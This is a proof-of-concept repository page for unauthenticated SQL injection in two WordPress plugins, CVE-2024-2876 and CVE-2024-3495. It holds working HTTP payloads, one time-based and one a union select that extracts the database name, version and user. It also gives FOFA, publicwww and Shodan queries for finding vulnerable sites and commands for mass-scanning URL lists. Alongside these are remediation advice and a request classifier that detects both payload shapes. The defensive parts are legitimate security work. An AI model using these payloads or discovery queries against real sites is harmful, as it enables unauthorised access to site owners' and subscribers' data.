
CVE-2024-2876 PoC — Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injection

Source
Associated Vulnerability
Title: Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injection (CVE-2024-2876)
Description: The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Description
WP-SQL-Injection CVE-2024-2876 AND CVE-2024-3495
Readme
---

# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495

This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.

## Vulnerability Descriptions

### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.

### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. Insufficient escaping of these parameters allows unauthenticated attackers to execute arbitrary SQL commands, leading to unauthorized access to sensitive database information.

## Scanner Script
To scan a single site or a list of sites for CVE-2024-2876 and CVE-2024-3495, run the bundled script:

```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```

## Querying for Affected Sites

### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`

### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`

## Proof of Concept (PoC) Code Blocks

### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint:

```http
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```

### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

## Remediation Steps

### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.
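As an added illustration of the WAF point above (this is not the repository's scanner nor any vendor's rule set), the following Python classifier flags the two request shapes this README documents: a non-identifier value in an `advanced_filter[...][field]` parameter sent to `admin-post.php` with `page=es_subscribers`, and a non-numeric `cnt`/`sid` sent to the `tc_csca_get_states` AJAX action. The request bodies are constructed samples, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies: one benign and one PoC-shaped request per
# endpoint, modelled on the two PoCs documented in this README.
SAMPLE_REQUESTS = [
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&is_ajax=1&action=_sent"
     "&advanced_filter[conditions][0][0][field]=status"
     "&advanced_filter[conditions][0][0][operator]=="
     "&advanced_filter[conditions][0][0][value]=1"),
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&is_ajax=1&action=_sent"
     "&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+"
     "&advanced_filter[conditions][0][0][operator]=="
     "&advanced_filter[conditions][0][0][value]=1111"),
    ("/wp-admin/admin-ajax.php",
     "action=tc_csca_get_states&nonce_ajax=abc&cnt=1"),
    ("/wp-admin/admin-ajax.php",
     "action=tc_csca_get_states&nonce_ajax=abc"
     "&cnt=1+or+0+union+select+concat(0x64,database()),2,3--+-"),
]

# A legitimate filter field is a bare column name; anything else is suspect.
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Generic second layer: SQL keywords, comment markers or quotes in any value.
SQL_HINT = re.compile(r"(?i)\b(union|select|sleep|benchmark)\b|--|/\*|'")


def first(params, key):
    return params.get(key, [""])[0]


def classify_request(path, body):
    """Return the reasons a request matches a PoC shape ([] if it is clean)."""
    params = parse_qs(body, keep_blank_values=True)
    reasons = []
    if path.endswith("/admin-post.php") and first(params, "page") == "es_subscribers":
        for key, vals in params.items():
            if key.startswith("advanced_filter[") and key.endswith("[field]"):
                reasons += [f"non-identifier filter field {v!r} in {key} (CVE-2024-2876 shape)"
                            for v in vals if not IDENT.match(v)]
    if path.endswith("/admin-ajax.php") and first(params, "action") == "tc_csca_get_states":
        for key in ("cnt", "sid"):
            v = first(params, key)
            if v and not v.isdigit():
                reasons.append(f"non-numeric {key}={v!r} (CVE-2024-3495 shape)")
    for key, vals in params.items():
        reasons += [f"SQL keyword or comment marker in {key}" for v in vals if SQL_HINT.search(v)]
    return reasons


if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        print(path, classify_request(path, body) or "clean")
```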

## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)

---
File Snapshot

```
[4.0K] /data/pocs/02b832679901c71eb1a7f9ad3ad62955a2f9df27
├── [5.1K] CVE-2024-2876.py
├── [ 845] CVE-2024-2876.yaml
├── [ 944] CVE-2024-3495.yaml
└── [3.5K] README.md

0 directories, 4 files
```